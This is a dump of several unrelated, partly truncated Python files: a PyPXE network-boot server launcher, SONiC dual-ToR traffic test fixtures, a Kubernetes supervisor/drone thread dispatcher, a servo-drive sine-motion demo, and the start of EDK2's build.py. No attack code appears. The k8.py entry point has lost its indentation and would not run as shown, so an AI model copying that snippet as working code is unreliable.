    dhcp_group.add_argument('--dhcp-begin', action = 'store', dest = 'DHCP_OFFER_BEGIN', help = 'DHCP lease range start', default = SETTINGS['DHCP_OFFER_BEGIN'])
    dhcp_group.add_argument('--dhcp-end', action = 'store', dest = 'DHCP_OFFER_END', help = 'DHCP lease range end', default = SETTINGS['DHCP_OFFER_END'])
    dhcp_group.add_argument('--dhcp-subnet', action = 'store', dest = 'DHCP_SUBNET', help = 'DHCP lease subnet', default = SETTINGS['DHCP_SUBNET'])
    dhcp_group.add_argument('--dhcp-router', action = 'store', dest = 'DHCP_ROUTER', help = 'DHCP lease router', default = SETTINGS['DHCP_ROUTER'])
    dhcp_group.add_argument('--dhcp-dns', action = 'store', dest = 'DHCP_DNS', help = 'DHCP lease DNS server', default = SETTINGS['DHCP_DNS'])
    dhcp_group.add_argument('--dhcp-broadcast', action = 'store', dest = 'DHCP_BROADCAST', help = 'DHCP broadcast address', default = SETTINGS['DHCP_BROADCAST'])
    dhcp_group.add_argument('--dhcp-fileserver', action = 'store', dest = 'DHCP_FILESERVER', help = 'DHCP fileserver IP', default = SETTINGS['DHCP_FILESERVER'])
    dhcp_group.add_argument('--dhcp-whitelist', action = 'store_true', dest = 'DHCP_WHITELIST', help = 'Only respond to DHCP clients present in --static-config', default = SETTINGS['DHCP_WHITELIST'])
    # HTTP server arguments
    http_group = parser.add_argument_group(title = 'HTTP', description = 'Arguments relevant to the HTTP server')
    http_group.add_argument('--http-port', action = 'store', dest = 'HTTP_PORT', help = 'HTTP Server Port', default = SETTINGS['HTTP_PORT'])
    http_group.add_argument('--http-server-ip', action = 'store', dest = 'HTTP_SERVER_IP', help = 'HTTP Server IP', default = SETTINGS['HTTP_SERVER_IP'])
    # network boot directory and file name arguments
    parser.add_argument('--netboot-dir', action = 'store', dest = 'NETBOOT_DIR', help = 'Local file serve directory', default = SETTINGS['NETBOOT_DIR'])
    parser.add_argument('--netboot-file', action = 'store', dest = 'NETBOOT_FILE', help = 'PXE boot file name (after iPXE if --ipxe)', default = SETTINGS['NETBOOT_FILE'])
    # NBD server arguments
    nbd_group = parser.add_argument_group(title = 'Network Block Device', description = 'Arguments relevant to the NBD server')
    nbd_group.add_argument('--nbd', action = 'store', dest = 'NBD_BLOCK_DEVICE', help = 'Enable the NDB server with a specific block device (Can be a disk image)', default = SETTINGS['NBD_BLOCK_DEVICE'])
    nbd_group.add_argument('--nbd-write', action = 'store_true', dest = 'NBD_WRITE', help = 'Enable writes on the NBD device', default = SETTINGS['NBD_WRITE'])
    nbd_group.add_argument('--nbd-cow', action = 'store_true', dest = 'NBD_COW', help = 'Enable copy-on-write for the NBD device (Non-persistent changes)', default = SETTINGS['NBD_COW'])
    nbd_group.add_argument('--nbd-cow-in-mem', action = 'store_true', dest = 'NBD_COW_IN_MEM', help = 'Store copy-on-write pages in memory', default = SETTINGS['NBD_COW_IN_MEM'])
    nbd_group.add_argument('--nbd-copy-to-ram', action = 'store_true', dest = 'NBD_COPY_TO_RAM', help = 'Copy the NBD device to memory before serving clients', default = SETTINGS['NBD_COPY_TO_RAM'])
    nbd_group.add_argument('--nbd-server', action = 'store', dest = 'NBD_SERVER_IP', help = 'NBD Server IP', default = SETTINGS['NBD_SERVER_IP'])
    nbd_group.add_argument('--nbd-port', action = 'store', dest = 'NBD_PORT', help = 'NBD Server Port', default = SETTINGS['NBD_PORT'])
    # TFTP server arguments
    tftp_group = parser.add_argument_group(title = 'TFTP', description = 'Arguments relevant to the TFTP server')
    tftp_group.add_argument('--tftp-server-ip', action = 'store', dest = 'TFTP_SERVER_IP', help = 'TFTP Server IP', default = SETTINGS['TFTP_SERVER_IP'])
    return parser.parse_args()
def do_debug(service):
    """Return True if debug output is enabled for *service*.

    A service is enabled when it (or 'all') appears in --debug, unless it is
    explicitly opted out with a '-service' entry (e.g. '--debug all,-dhcp').
    """
    selected = args.MODE_DEBUG.lower()
    enabled = service in selected or 'all' in selected
    opted_out = '-{0}'.format(service) in selected
    return enabled and not opted_out
def do_verbose(service):
    """Return True if verbose output is enabled for *service*.

    Same selection rules as do_debug(), but driven by --verbose.
    """
    selected = args.MODE_VERBOSE.lower()
    enabled = service in selected or 'all' in selected
    opted_out = '-{0}'.format(service) in selected
    return enabled and not opted_out
def main():
    """Parse configuration, start the enabled PyPXE services (TFTP, DHCP,
    HTTP, NBD) in daemon threads, and block until a service dies or Ctrl-C.

    Configuration precedence: built-in SETTINGS < JSON config (--config) <
    CLI arguments (re-parsed after SETTINGS is updated from JSON).
    """
    global SETTINGS, args
    try:
        # configure
        args = parse_cli_arguments()
        if args.DUMP_CONFIG or args.DUMP_CONFIG_MERGED:
            if args.DUMP_CONFIG:
                settings = SETTINGS
            else:
                # some arguments don't make sense to print
                settings = args.__dict__
                del settings['DUMP_CONFIG']
                del settings['DUMP_CONFIG_MERGED']
                del settings['JSON_CONFIG']
            print(json.dumps(settings, sort_keys=True, indent=4))
            sys.exit()
        if args.JSON_CONFIG: # load from configuration file if specified
            try:
                config_file = io.open(args.JSON_CONFIG, 'r')
            except IOError:
                sys.exit('Failed to open {0}'.format(args.JSON_CONFIG))
            try:
                loaded_config = json.load(config_file)
                config_file.close()
            except ValueError:
                sys.exit('{0} does not contain valid JSON'.format(args.JSON_CONFIG))
            for setting in loaded_config:
                # Normalize any bytes values to str. BUGFIX: the original
                # called .encode('ascii') on bytes, which does not exist on
                # Python 3 bytes objects (a Python 2 'unicode' leftover).
                if type(loaded_config[setting]) is bytes:
                    loaded_config[setting] = loaded_config[setting].decode('ascii')
            SETTINGS.update(loaded_config) # update settings with JSON config
            args = parse_cli_arguments() # re-parse, CLI options take precedence
        # warn the user that they are starting PyPXE as non-root user
        if os.getuid() != 0:
            # BUGFIX: the original passed sys.stderr as a positional argument
            # to print(), printing the file object itself; use file= instead.
            print('\nWARNING: Not root. Servers will probably fail to bind.\n', file=sys.stderr)
        # ideally this would be in dhcp itself, but the chroot below *probably*
        # breaks the ability to open the config file.
        if args.STATIC_CONFIG:
            try:
                static_config = io.open(args.STATIC_CONFIG, 'r')
            except IOError:
                sys.exit("Failed to open {0}".format(args.STATIC_CONFIG))
            try:
                loaded_statics = json.load(static_config)
                static_config.close()
            except ValueError:
                sys.exit("{0} does not contain valid json".format(args.STATIC_CONFIG))
        else:
            loaded_statics = dict()
        # setup main logger
        sys_logger = logging.getLogger('PyPXE')
        if args.SYSLOG_SERVER:
            handler = logging.handlers.SysLogHandler(address = (args.SYSLOG_SERVER, int(args.SYSLOG_PORT)))
        else:
            handler = logging.StreamHandler()
        formatter = logging.Formatter('%(asctime)s [%(levelname)s] %(name)s %(message)s')
        handler.setFormatter(formatter)
        sys_logger.addHandler(handler)
        sys_logger.setLevel(logging.INFO)
        # pass warning to user regarding starting HTTP server without iPXE
        if args.USE_HTTP and not args.USE_IPXE and not args.USE_DHCP:
            sys_logger.warning('HTTP selected but iPXE disabled. PXE ROM must support HTTP requests.')
        # if the argument was passed to enable ProxyDHCP then enable the DHCP server
        if args.DHCP_MODE_PROXY:
            args.USE_DHCP = True
        # if the network boot file name was not specified in the argument,
        # set it based on what services were enabled/disabled
        if args.NETBOOT_FILE == '':
            if not args.USE_IPXE:
                args.NETBOOT_FILE = 'pxelinux.0'
            elif not args.USE_HTTP:
                args.NETBOOT_FILE = 'boot.ipxe'
            else:
                args.NETBOOT_FILE = 'boot.http.ipxe'
        if args.NBD_WRITE and not args.NBD_COW:
            sys_logger.warning('NBD Write enabled but copy-on-write is not. Multiple clients may cause corruption')
        if args.NBD_COW_IN_MEM or args.NBD_COPY_TO_RAM:
            sys_logger.warning('NBD cowinmem and copytoram can cause high RAM usage')
        if args.NBD_COW and not args.NBD_WRITE:
            # cow implies write
            args.NBD_WRITE = True
        # make a list of running threads for each service
        running_services = []
        # configure/start TFTP server
        if args.USE_TFTP:
            # setup TFTP logger
            tftp_logger = helpers.get_child_logger(sys_logger, 'TFTP')
            sys_logger.info('Starting TFTP server...')
            # setup the thread
            tftp_server = tftp.TFTPD(
                mode_debug = do_debug('tftp'),
                mode_verbose = do_verbose('tftp'),
                logger = tftp_logger,
                netboot_directory = args.NETBOOT_DIR,
                ip = args.TFTP_SERVER_IP)
            tftpd = threading.Thread(target = tftp_server.listen)
            tftpd.daemon = True
            tftpd.start()
            running_services.append(tftpd)
        # configure/start DHCP server
        if args.USE_DHCP:
            # setup DHCP logger
            dhcp_logger = helpers.get_child_logger(sys_logger, 'DHCP')
            if args.DHCP_MODE_PROXY:
                sys_logger.info('Starting DHCP server in ProxyDHCP mode...')
            else:
                sys_logger.info('Starting DHCP server...')
            # setup the thread
            dhcp_server = dhcp.DHCPD(
                ip = args.DHCP_SERVER_IP,
                port = args.DHCP_SERVER_PORT,
                offer_from = args.DHCP_OFFER_BEGIN,
                offer_to = args.DHCP_OFFER_END,
                subnet_mask = args.DHCP_SUBNET,
                router = args.DHCP_ROUTER,
                dns_server = args.DHCP_DNS,
                broadcast = args.DHCP_BROADCAST,
                file_server = args.DHCP_FILESERVER,
                file_name = args.NETBOOT_FILE,
                use_ipxe = args.USE_IPXE,
                use_http = args.USE_HTTP,
                mode_proxy = args.DHCP_MODE_PROXY,
                mode_debug = do_debug('dhcp'),
                mode_verbose = do_verbose('dhcp'),
                whitelist = args.DHCP_WHITELIST,
                static_config = loaded_statics,
                logger = dhcp_logger,
                saveleases = args.LEASES_FILE)
            dhcpd = threading.Thread(target = dhcp_server.listen)
            dhcpd.daemon = True
            dhcpd.start()
            running_services.append(dhcpd)
        # configure/start HTTP server
        if args.USE_HTTP:
            # setup HTTP logger
            http_logger = helpers.get_child_logger(sys_logger, 'HTTP')
            sys_logger.info('Starting HTTP server...')
            # setup the thread
            http_server = http.HTTPD(
                mode_debug = do_debug('http'),
                mode_verbose = do_verbose('http'),
                logger = http_logger,
                port = args.HTTP_PORT,
                netboot_directory = args.NETBOOT_DIR,
                ip = args.HTTP_SERVER_IP)
            httpd = threading.Thread(target = http_server.listen)
            httpd.daemon = True
            httpd.start()
            running_services.append(httpd)
        # configure/start NBD server
        if args.NBD_BLOCK_DEVICE:
            # setup NBD logger
            nbd_logger = helpers.get_child_logger(sys_logger, 'NBD')
            sys_logger.info('Starting NBD server...')
            nbd_server = nbd.NBD(
                block_device = args.NBD_BLOCK_DEVICE,
                write = args.NBD_WRITE,
                cow = args.NBD_COW,
                in_mem = args.NBD_COW_IN_MEM,
                copy_to_ram = args.NBD_COPY_TO_RAM,
                ip = args.NBD_SERVER_IP,
                port = args.NBD_PORT,
                mode_debug = do_debug('nbd'),
                mode_verbose = do_verbose('nbd'),
                logger = nbd_logger,
                netboot_directory = args.NETBOOT_DIR)
            nbdd = threading.Thread(target = nbd_server.listen)
            nbdd.daemon = True
            nbdd.start()
            running_services.append(nbdd)
        sys_logger.info('PyPXE successfully initialized and running!')
        # Keep the main thread alive while every service thread is alive.
        while all(map(lambda x: x.is_alive(), running_services)):
            sleep(1)
    except KeyboardInterrupt:
        sys.exit('\nShutting down PyPXE...\n')
# Script entry point: run PyPXE when executed directly.
if __name__ == '__main__':
    main()
|
data_plane_utils.py | import pytest
from tests.common.dualtor.dual_tor_io import DualTorIO
from tests.common.helpers.assertions import pytest_assert
import threading
import logging
logger = logging.getLogger(__name__)
def arp_setup(ptfhost):
    """Install and start the ARP responder on the PTF container.

    Copies the responder script, configures it under supervisord via a
    template, and reloads supervisorctl so it starts serving.

    Args:
        ptfhost: Fixture handle for the PTF container host
    """
    logger.info('Copy ARP responder to the PTF container {}'.format(ptfhost.hostname))
    ptfhost.copy(src='scripts/arp_responder.py', dest='/opt')
    # '-e' is passed through the template into the responder's supervisord args
    ptfhost.host.options["variable_manager"].extra_vars.update({"arp_responder_args": "-e"})
    ptfhost.template(src="templates/arp_responder.conf.j2",
                     dest="/etc/supervisor/conf.d/arp_responder.conf")
    # Consistency fix: use the module logger instead of the root logger
    # (the original mixed logger.info and logging.info).
    logger.info("Refreshing supervisorctl")
    ptfhost.shell("supervisorctl reread && supervisorctl update")
def validate_IO_results(tor_IO, allowed_disruption, delay):
    """Validate the traffic statistics collected by a DualTorIO run.

    Asserts that packets were received at all, that traffic was disrupted at
    most `allowed_disruption` times, and that no single disruption exceeded
    `delay` seconds. Logs a warning if any packets were dropped.

    Args:
        tor_IO: DualTorIO instance holding the collected traffic statistics
        allowed_disruption: Maximum acceptable number of traffic disruptions
        delay: Maximum acceptable duration (seconds) of a single disruption
    """
    received_counter = tor_IO.get_total_received_packets()
    total_disruptions = tor_IO.get_total_disruptions()
    longest_disruption = tor_IO.get_longest_disruption()
    total_lost_packets = tor_IO.get_total_dropped_packets()
    if received_counter:
        # BUGFIX: compare against the allowed_disruption parameter instead of
        # a hard-coded 1 — the failure message already reported the parameter.
        pytest_assert(total_disruptions <= allowed_disruption,
                      "Traffic was disrupted {} times. Allowed number of disruption: {}"
                      .format(total_disruptions, allowed_disruption))
        pytest_assert(longest_disruption <= delay,
                      "Traffic was disrupted for {}s. Maximum allowed disruption: {}s"
                      .format(longest_disruption, delay))
    else:
        pytest_assert(received_counter > 0, "Test failed to capture any meaningful received packet")
    if total_lost_packets:
        # logging.warn is deprecated; use the module logger for consistency
        logger.warning("Packets were lost during the test. Total lost count: {}".format(total_lost_packets))
@pytest.fixture
def send_t1_to_server_after_action(ptfhost, ptfadapter, tbinfo):
    """
    Starts IO test from T1 router to server.
    As part of IO test the background thread sends and sniffs packets.
    As soon as sender and sniffer threads are in running state, a callback
    action is performed.
    When action is finished, the sender and sniffer threads are given time to
    complete.
    Finally, the collected packets are sniffed, and the disruptions are
    measured.
    As part of teardown, the ARP table is cleared and ptf dataplane is flushed.
    Args:
        ptfhost (fixture): Fixture for PTF instance to be used during the test
        ptfadapter (fixture): Fixture which provides helper utility to use ptf
            testutils
        tbinfo (fixture): Fixture for testbed inventory information
    Yields:
        function: A helper function to run and monitor the IO test
    """
    arp_setup(ptfhost)
    # Track every DUT exercised so teardown can clear its ARP table.
    duthosts = []

    def t1_to_server_io_test(duthost, server_port=None, tor_port=None, delay=1, timeout=5, action=None):
        """
        Helper method for `send_t1_to_server_after_action`.
        Starts sender and sniffer before performing the action on the tor host.
        Args:
            server_port: The port intended to receive the packet
            tor_port: The T1 port through which to send the packet. Connected
                to either the upper or lower ToR.
                default - None. If set to None, the test chooses a random
                portchannel member port for this test.
            delay: Maximum acceptable delay for traffic to continue flowing
                again
            timeout: Time to wait for packet to be transmitted
            action: Some function (with args) which performs the desired
                action, or `None` if no action/delay is desired
        """
        duthosts.append(duthost)
        # io_ready is set by the IO threads once sender and sniffer are live.
        io_ready = threading.Event()
        tor_IO = DualTorIO(duthost, ptfhost, ptfadapter, tbinfo, server_port, tor_port, delay, timeout, io_ready)
        send_and_sniff = threading.Thread(target=tor_IO.start_io_test, kwargs={'traffic_generator': tor_IO.generate_from_t1_to_server})
        send_and_sniff.start()
        if action:
            # do not perform the provided action until IO threads (sender and sniffer) are ready
            io_ready.wait()
            logger.info("Sender and sniffer threads started, ready to execute the callback action")
            action()
        # Wait for the IO to complete before doing checks
        logger.info("Waiting for sender and sniffer threads to finish..")
        send_and_sniff.join()
        validate_IO_results(tor_IO, allowed_disruption=1, delay=delay)

    yield t1_to_server_io_test

    # cleanup torIO
    ptfadapter.dataplane.flush()
    for duthost in duthosts:
        logger.info('Clearing arp entries on DUT {}'.format(duthost.hostname))
        duthost.shell('sonic-clear arp')
@pytest.fixture
def send_server_to_t1_after_action(ptfhost, ptfadapter, tbinfo):
    """
    Starts IO test from server to T1 router.
    As part of IO test the background thread sends and sniffs packets.
    As soon as sender and sniffer threads are in running state, a callback
    action is performed.
    When action is finished, the sender and sniffer threads are given time to
    complete.
    Finally, the collected packets are sniffed, and the disruptions are
    measured.
    As part of teardown, the ARP, FDB tables are cleared and ptf dataplane is
    flushed.
    Args:
        ptfhost (fixture): Fixture for PTF instance to be used during the test
        ptfadapter (fixture): Fixture which provides helper utility to use ptf
            testutils
        tbinfo (fixture): Fixture for testbed inventory information
    Yields:
        function: A helper function to run and monitor the IO test
    """
    arp_setup(ptfhost)
    # Track every DUT exercised so teardown can clear its ARP table.
    duthosts = []

    def server_to_t1_io_test(duthost, server_port=None, tor_port=None, delay=1, timeout=5, action=None):
        """
        Helper method for `send_server_to_t1_after_action`.
        Starts sender and sniffer before performing the action on the tor host.
        Args:
            server_port: The port intended to receive the packet
            tor_port: The port through which to send the packet. Connected to
                either the upper or lower ToR.
                default - None. If set to None, the test chooses a random
                portchannel member port for this test.
            delay: Maximum acceptable delay for traffic to continue flowing
                again
            timeout: Time to wait for packet to be transmitted
            action: Some function (with args) which performs the desired
                action, or `None` if no action/delay is desired
        """
        duthosts.append(duthost)
        # io_ready is set by the IO threads once sender and sniffer are live.
        io_ready = threading.Event()
        tor_IO = DualTorIO(duthost, ptfhost, ptfadapter, tbinfo, server_port, tor_port, delay, timeout, io_ready)
        send_and_sniff = threading.Thread(target=tor_IO.start_io_test, kwargs={'traffic_generator': tor_IO.generate_from_server_to_t1})
        send_and_sniff.start()
        if action:
            # do not perform the provided action until IO threads (sender and sniffer) are ready
            io_ready.wait()
            logger.info("Sender and sniffer threads started, ready to execute the callback action")
            action()
        # Wait for the IO to complete before doing checks
        send_and_sniff.join()
        validate_IO_results(tor_IO, allowed_disruption=1, delay=delay)

    yield server_to_t1_io_test

    # cleanup torIO
    ptfadapter.dataplane.flush()
    for duthost in duthosts:
        logger.info('Clearing arp entries on DUT {}'.format(duthost.hostname))
        duthost.shell('sonic-clear arp')
|
k8.py |
import logging, coloredlogs

# Module logger with colored console output; also colorize the 'pbt' and
# 'experiment' loggers used by the worker code this module drives.
logger = logging.getLogger(__name__)
coloredlogs.install(level='DEBUG',logger=logger)
coloredlogs.install(level='DEBUG',logger=logging.getLogger('pbt'))
coloredlogs.install(level='DEBUG',logger=logging.getLogger('experiment'))

import requests
import json
import platform
import time
import pika
import threading
import traceback

# NOTE(review): wildcard import — presumably provides get_args, get_drone and
# get_supervisor used below; verify against the helpers module.
from .helpers import *
def i_am_supervisor(args):
    """Return True if this pod is the elected leader.

    Queries the leadership-election sidecar at localhost:4040 and compares the
    reported leader name against this node's hostname. If the sidecar cannot
    be reached, assume we are not the leader; for non-OK HTTP responses an
    HTTPError is raised.
    """
    try:
        res = requests.get("http://localhost:4040")
    except requests.exceptions.ConnectionError:
        logger.warning("Could not contact leadership election sidecar, assuming not leader")
        return False
    if not res.ok:
        res.raise_for_status()
    payload = json.loads(res.content)
    return payload["name"] == platform.node()
def i_am_drone(args):
    """Return True if this pod should run drone work.

    Every non-supervisor pod is a drone; the supervisor also works as a drone
    when args.master_works is set.
    """
    return (not i_am_supervisor(args)) or args.master_works
# --------------------------------------------------------------------------
# Thread work loops
# --------------------------------------------------------------------------
def do_drone(args):
    """Worker loop: run drone epochs while this pod is drone-eligible.

    Re-checks eligibility every cycle: starts a drone when we become eligible,
    stops it when we lose eligibility, and runs one epoch per cycle while a
    drone is active. Exits cleanly on Ctrl-C; any other exception is printed
    and re-raised.
    """
    drone = None
    try:
        while True:
            am_drone = i_am_drone(args)
            if am_drone and drone is None:
                logger.info("Start drone")
                drone = get_drone(args)
            elif not am_drone and drone is not None:
                logger.info("Stop drone")
                drone.close()
                drone = None
            if drone is not None:
                drone.run_epoch()
            time.sleep(args.sleep_per_cycle)
    # TODO: actual signalling
    except KeyboardInterrupt:
        if drone is not None:
            drone.close()
    except Exception:
        traceback.print_exc()
        # Bare raise preserves the original traceback; the previous `raise e`
        # re-raised from the handler frame.
        raise
def do_supervisor(args):
    """Worker loop: run supervisor epochs while this pod holds leadership.

    Mirrors do_drone(): starts a supervisor when this pod becomes the leader,
    stops it on loss of leadership, and runs one epoch per cycle while
    active. Exits cleanly on Ctrl-C; any other exception is printed and
    re-raised.
    """
    sup = None
    try:
        while True:
            am_sup = i_am_supervisor(args)
            if am_sup and sup is None:
                logger.info("Start supervisor")
                sup = get_supervisor(args)
            elif not am_sup and sup is not None:
                logger.info("Stop supervisor")
                sup.close()
                sup = None
            if sup is not None:
                sup.run_epoch()
            time.sleep(args.sleep_per_cycle)
    # TODO: actual signalling
    except KeyboardInterrupt:
        if sup is not None:
            sup.close()
    except Exception:
        traceback.print_exc()
        # Bare raise preserves the original traceback; the previous `raise e`
        # re-raised from the handler frame.
        raise
# --------------------------------------------------------------------------
# Dispatch threads from main loop
# --------------------------------------------------------------------------
def run_main_dispatch(args):
    """Supervise the worker threads, (re)spawning any that die.

    Keeps one supervisor thread and args.n_drones drone threads alive,
    restarting each whenever it is missing or no longer running. All threads
    are daemons so they die with the process. Ctrl-C exits the loop.
    """
    my_sup = None
    my_drones = {k: None for k in range(args.n_drones)}
    try:
        while True:
            # BUGFIX: Thread.isAlive() was removed in Python 3.9 and
            # Thread.setDaemon() is deprecated; use is_alive() / .daemon.
            if my_sup is None or not my_sup.is_alive():
                logger.debug("Dispatch supervisor thread")
                my_sup = threading.Thread(target=do_supervisor, args=(args,))
                my_sup.daemon = True
                my_sup.start()
            for key, drone in my_drones.items():
                if drone is None or not drone.is_alive():
                    logger.debug("Dispatch drone thread")
                    t = threading.Thread(target=do_drone, args=(args,))
                    t.daemon = True
                    t.start()
                    my_drones[key] = t
            time.sleep(args.sleep_per_cycle)
    except KeyboardInterrupt:
        # do something to signal to threads
        pass
if __name__ == "__main__":
args = get_args()
run_main_dispatch(args)
|
basic_motion.py | import ingenialink as il
import numpy as np
import argparse
from time import sleep
import threading
# Drive operation-mode codes written to DRV_OP_CMD.
# NOTE(review): presumably Cyclic Synchronous Velocity / Position modes —
# confirm against the drive's register documentation.
CSV_MODE = 35
CSP_MODE = 36

# Flag polled by the reader thread; set to True to stop it.
stop_thread = False
# Seconds between consecutive target updates (also the sine sample period).
sampling_time = 0.1
def read_thread(servo, actual_val_reg_id):
    """Continuously print the drive's actual-value register until the module
    flag ``stop_thread`` becomes True.

    Fixes vs. original: the loop had no delay, so it hammered the drive with
    read requests and pegged a CPU core; it now sleeps ``sampling_time``
    between reads (matching the write-side cadence).  The ``global``
    declaration was dropped — the flag is only read here, never assigned.
    """
    while not stop_thread:
        print("Actual value: ", servo.read(actual_val_reg_id))
        sleep(sampling_time)  # throttle polling to the sampling period
def slave_connection(ip):
    """Try to connect to the drive at *ip* (port 1061) via ingenialink.

    Returns the servo object on success, or None if the connection failed.

    Fixes vs. original: the bare ``except:`` swallowed every exception —
    including KeyboardInterrupt — and hid the actual cause; it is narrowed
    to ``Exception`` and the error is included in the message.
    """
    servo = None
    try:
        _, servo = il.lucky(il.NET_PROT.ETH, "eve-xcr_1.5.2.xdf", address_ip=ip, port_ip=1061)
    except Exception as exc:
        print("There was an error while scanning the network:", exc)
    return servo
def basic_motion(args):
    """Drive a slow sine-wave motion on the connected drive.

    Connects to the slave at ``args.ip``, selects CSV or CSP mode from
    ``args.op``, enables the motor, streams 10 seconds of sine-wave targets
    while a background thread prints the actual value, then disables.

    Returns 0 on success, -1 if no slave was found, -2 on enable/disable
    failure.

    Fixes vs. original: bare ``except:`` clauses narrowed to ``Exception``;
    the reader thread is now stopped in a ``finally`` block, so a failed
    ``servo.write`` mid-loop no longer leaves the non-daemon thread running
    forever (which hung the process); ``stop_thread`` is reset to False so
    the function can be called more than once; the local ``time`` variable
    was renamed to avoid confusion with the ``time`` module.
    """
    global stop_thread

    servo = slave_connection(args.ip)
    if servo is None:
        print("Cannot find any slave connected.")
        return -1
    print("Slave found!")
    # Select registers and target scaling for the requested operation mode.
    if args.op == 'CSV':
        op_mode = CSV_MODE
        target_reg_id = 'CL_VEL_SET_POINT_VALUE'
        actual_val_reg_id = 'FBK_CUR_MODULE_VALUE'
        multiplier = 10
    else:
        op_mode = CSP_MODE
        target_reg_id = 'CL_POS_SET_POINT_VALUE'
        actual_val_reg_id = 'CL_POS_FBK_VALUE'
        multiplier = 1000
    # Set Operation Mode
    servo.write('DRV_OP_CMD', op_mode)
    # Generate a slow sine wave of 10 seconds
    t_axis = np.arange(0, 10, sampling_time)
    amplitude = np.sin(t_axis)
    print("Amplitude: ", amplitude)
    # Enable motor
    try:
        servo.enable()
    except Exception:
        print("Cannot enable the motor")
        return -2
    # Start reading thread (reset the flag in case of a previous run).
    stop_thread = False
    thread = threading.Thread(target=read_thread, args=(servo, actual_val_reg_id))
    thread.start()
    try:
        # Send the generated targets at the sampling cadence.
        for value in amplitude:
            print("Target demanded: ", value * multiplier)
            servo.write(target_reg_id, int(value * multiplier))
            sleep(sampling_time)
    finally:
        # Always stop the reader thread, even if a write failed.
        stop_thread = True
        thread.join()
    # Disable motor
    try:
        servo.disable()
    except Exception:
        print("Cannot disable the motor")
        return -2
    return 0
if __name__ == '__main__':
    # Command-line interface for the demo application.
    cli = argparse.ArgumentParser(description='Basic Motion Application.')
    cli.add_argument('--ip', metavar="", type=str,
                     default='192.168.2.22',
                     help='the ip of the drive. 192.168.2.22 by default')
    cli.add_argument('--op', metavar="", type=str,
                     default='CSP',
                     help='Operation mode to use [CSP, CSV]')
    basic_motion(cli.parse_args())
build.py | ## @file
# build a platform or a module
#
# Copyright (c) 2014, Hewlett-Packard Development Company, L.P.<BR>
# Copyright (c) 2007 - 2021, Intel Corporation. All rights reserved.<BR>
# Copyright (c) 2018, Hewlett Packard Enterprise Development, L.P.<BR>
# Copyright (c) 2020 - 2021, ARM Limited. All rights reserved.<BR>
#
# SPDX-License-Identifier: BSD-2-Clause-Patent
#
##
# Import Modules
#
from __future__ import print_function
from __future__ import absolute_import
import os.path as path
import sys
import os
import re
import glob
import time
import platform
import traceback
import multiprocessing
from threading import Thread,Event,BoundedSemaphore
import threading
from linecache import getlines
from subprocess import Popen,PIPE, STDOUT
from collections import OrderedDict, defaultdict
from AutoGen.PlatformAutoGen import PlatformAutoGen
from AutoGen.ModuleAutoGen import ModuleAutoGen
from AutoGen.WorkspaceAutoGen import WorkspaceAutoGen
from AutoGen.AutoGenWorker import AutoGenWorkerInProcess,AutoGenManager,\
LogAgent
from AutoGen import GenMake
from Common import Misc as Utils
from Common.TargetTxtClassObject import TargetTxtDict
from Common.ToolDefClassObject import ToolDefDict
from buildoptions import MyOptionParser
from Common.Misc import PathClass,SaveFileOnChange,RemoveDirectory
from Common.StringUtils import NormPath
from Common.MultipleWorkspace import MultipleWorkspace as mws
from Common.BuildToolError import *
from Common.DataType import *
import Common.EdkLogger as EdkLogger
from Workspace.WorkspaceDatabase import BuildDB
from BuildReport import BuildReport
from GenPatchPcdTable.GenPatchPcdTable import PeImageClass,parsePcdInfoFromMapFile
from PatchPcdValue.PatchPcdValue import PatchBinaryFile
import Common.GlobalData as GlobalData
from GenFds.GenFds import GenFds, GenFdsApi
import multiprocessing as mp
from multiprocessing import Manager
from AutoGen.DataPipe import MemoryDataPipe
from AutoGen.ModuleAutoGenHelper import WorkSpaceInfo, PlatformInfo
from GenFds.FdfParser import FdfParser
from AutoGen.IncludesAutoGen import IncludesAutoGen
from GenFds.GenFds import resetFdsGlobalVariable
from AutoGen.AutoGen import CalculatePriorityValue
## standard targets of build command
gSupportedTarget = ['all', 'genc', 'genmake', 'modules', 'libraries', 'fds', 'clean', 'cleanall', 'cleanlib', 'run']
# Matches auto-generated temporary table names of the form _<num>_<num>_<hex>.
TemporaryTablePattern = re.compile(r'^_\d+_\d+_[a-fA-F0-9]+$')
# Cache of temporary tables; presumably populated elsewhere in the build tools
# (not referenced in this portion of the file).
TmpTableDict = {}
## Check environment PATH variable to make sure the specified tool is found
#
# If the tool is found in the PATH, then True is returned
# Otherwise, False is returned
#
def IsToolInPath(tool):
    """Return True if *tool* (with any PATHEXT extension) exists in a PATH directory."""
    # On Windows, PATHEXT lists executable extensions; elsewhere try the bare name.
    if 'PATHEXT' in os.environ:
        extensions = os.environ['PATHEXT'].split(os.path.pathsep)
    else:
        extensions = ('',)
    candidates = (
        os.path.join(directory, tool + extension)
        for directory in os.environ['PATH'].split(os.path.pathsep)
        for extension in extensions
    )
    return any(os.path.exists(candidate) for candidate in candidates)
## Check environment variables
#
# Check environment variables that must be set for build. Currently they are
#
# WORKSPACE The directory all packages/platforms start from
# EDK_TOOLS_PATH The directory contains all tools needed by the build
# PATH $(EDK_TOOLS_PATH)/Bin/<sys> must be set in PATH
#
# If any of above environment variable is not set or has error, the build
# will be broken.
#
def CheckEnvVariable():
    """Validate the environment variables required for a build.

    Checks WORKSPACE (exists, no spaces), PACKAGES_PATH entries,
    EDK_TOOLS_PATH and PATH, normalizing WORKSPACE/EDK_TOOLS_PATH in
    os.environ and publishing them into GlobalData.  Each failure is
    reported through EdkLogger.error (which aborts the build).

    Fix vs. original: os.environ["EDK_TOOLS_PATH"] was normalized *before*
    the presence check, so a missing variable raised a raw KeyError instead
    of the friendly "Environment variable not found" error.  The check now
    runs first.
    """
    # check WORKSPACE
    if "WORKSPACE" not in os.environ:
        EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
                        ExtraData="WORKSPACE")
    WorkspaceDir = os.path.normcase(os.path.normpath(os.environ["WORKSPACE"]))
    if not os.path.exists(WorkspaceDir):
        EdkLogger.error("build", FILE_NOT_FOUND, "WORKSPACE doesn't exist", ExtraData=WorkspaceDir)
    elif ' ' in WorkspaceDir:
        EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in WORKSPACE path",
                        ExtraData=WorkspaceDir)
    os.environ["WORKSPACE"] = WorkspaceDir
    # set multiple workspace
    PackagesPath = os.getenv("PACKAGES_PATH")
    mws.setWs(WorkspaceDir, PackagesPath)
    if mws.PACKAGES_PATH:
        for Path in mws.PACKAGES_PATH:
            if not os.path.exists(Path):
                EdkLogger.error("build", FILE_NOT_FOUND, "One Path in PACKAGES_PATH doesn't exist", ExtraData=Path)
            elif ' ' in Path:
